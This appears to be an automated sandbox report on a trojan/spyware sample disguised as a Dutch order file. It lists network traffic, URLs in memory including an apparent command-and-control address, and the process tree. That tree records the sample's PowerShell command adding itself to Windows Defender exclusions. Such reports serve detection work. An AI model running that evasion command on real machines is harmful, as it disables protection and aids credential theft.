                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 11 Dec 2024 08:43:01 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-11T08:43:06.6549188Z
                Source: svchost.exe, 00000014.00000002.4501548462.0000028F71800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.20.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.20.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://giganet.ua/ru
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inau.ua/
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://partner.mirohost.net
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://schema.org/Organization
                Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                Source: msapplication.xml.15.drString found in binary or memory: http://www.amazon.com/
                Source: msapplication.xml2.15.drString found in binary or memory: http://www.google.com/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ix.net.ua/ru
                Source: msapplication.xml3.15.drString found in binary or memory: http://www.live.com/
                Source: msapplication.xml4.15.drString found in binary or memory: http://www.nytimes.com/
                Source: msapplication.xml5.15.drString found in binary or memory: http://www.reddit.com/
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4502014395.0000000004C21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.restobarbebek.xyz
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4502014395.0000000004C21000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.restobarbebek.xyz/jm9b/
                Source: msapplication.xml6.15.drString found in binary or memory: http://www.twitter.com/
                Source: msapplication.xml7.15.drString found in binary or memory: http://www.wikipedia.com/
                Source: msapplication.xml8.15.drString found in binary or memory: http://www.youtube.com/
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: me[1].json.29.drString found in binary or memory: https://api.msn.com:443/msn/Feed/me?$top=32&delta=True&session=925e1e92-229e-406c-801f-97b7ff304f70&
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.1f8adf23ae17879d63ff.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
                Source: 6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://booking.com/dealspage.html?campaign_id=&aid=1533676&label=enus-native-backfill
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-dark
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81
                Source: me[1].json.29.drString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81-dark
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: manifest.json0.19.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: manifest.json0.19.drString found in binary or memory: https://chromewebstore.google.com/
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://clients2.google.com
                Source: manifest.json.19.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.imena.ua/login.php?lang=2
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.mirohost.net/auth/login.php?lang=ru
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211
                Source: manifest.json.19.drString found in binary or memory: https://docs.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: manifest.json.19.drString found in binary or memory: https://drive.google.com/
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 7ed7d6ce-ca68-409f-9ee0-99a5ad271922.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=Addre
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log4.19.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                Source: me[1].json.29.drString found in binary or memory: https://ew.com/article/2002/06/24/angela-bassett-slams-halle-berrys-oscar-role/

                E-Banking Fraud

                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                Source: Nieuwebestellingen10122024.exeStatic PE information: No import functions for PE file found
                Source: Nieuwebestellingen10122024.exe, 00000000.00000000.2035871116.000001DF34222000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleApplication2.exeH vs Nieuwebestellingen10122024.exe
                Source: Nieuwebestellingen10122024.exeBinary or memory string: OriginalFilenameConsoleApplication2.exeH vs Nieuwebestellingen10122024.exe
                Source: Nieuwebestellingen10122024.exe, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@67/281@33/16
                Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\RecoveryJump to behavior
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6096
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi2jc1cc.zkp.ps1Jump to behavior
                Source: Nieuwebestellingen10122024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Nieuwebestellingen10122024.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wscript.exe, 0000000C.00000003.2555626623.0000000000903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2548766694.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4498888550.0000000000903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2555391886.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4498888550.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2555626623.00000000008D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Nieuwebestellingen10122024.exeReversingLabs: Detection: 36%
                Source: Nieuwebestellingen10122024.exeVirustotal: Detection: 30%
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | File read: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, wbemcomn.dll, sspicli.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
